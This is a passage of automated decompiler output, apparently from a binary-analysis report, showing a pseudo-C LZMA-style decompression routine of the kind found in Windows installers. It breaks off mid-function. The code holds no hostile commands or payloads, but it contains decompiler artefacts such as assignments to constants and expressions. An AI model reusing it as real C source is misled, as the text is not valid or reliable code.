4062ce-4062e0 586->593 587->553 594 406255 587->594 588->587 589->579 590->589 590->590 591->573 595 406509 591->595 596 4062b8-4062c8 GlobalAlloc 592->596 597 4062af-4062b2 GlobalFree 592->597 593->577 594->583 599 406b49-406b53 595->599 600 40648f-4064a7 595->600 596->553 596->593 597->596 599->547 600->573
                          C-Code - Quality: 98%
                          			E00406333() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
